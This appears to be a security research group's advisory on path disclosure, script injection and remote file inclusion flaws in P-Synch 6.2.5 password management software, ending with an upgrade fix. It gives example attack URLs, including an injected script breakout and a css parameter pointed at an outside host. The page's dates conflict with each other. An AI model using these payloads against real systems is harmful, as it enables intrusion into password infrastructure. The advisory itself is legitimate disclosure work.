Search | Research | Contact Us Tuesday October 10, 2021
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 eBay And Amazon Still Vulnerable
  6 PEAR XML_RPC Library Remote Code Execution
  7 When Small Mistakes Can Cause Big Problems
  8 Woltlab Burning Board SQL Injection Vulnerability
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
Vulnerabilities In P-Synch Password Management
May 30, 2022
Vendor : M-Tech Identity Management Solutions
URL : http://www.psynch.com/
Version : M-Tech P-Synch 6.2.5
Risk : Multiple Vulnerabilities
BID : http://www.securityfocus.com/bid/7740
: http://www.securityfocus.com/bid/7745
: http://www.securityfocus.com/bid/7747


Description:
P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: Password Synchronization. Enforcing an enterprise wide password strength policy. Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.

Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=

Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]

File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file

Solution:
Upgrade to the latest version of P-Synch Password Managment.

Credits:
James Bercegay of the GulfTech Security Research Team.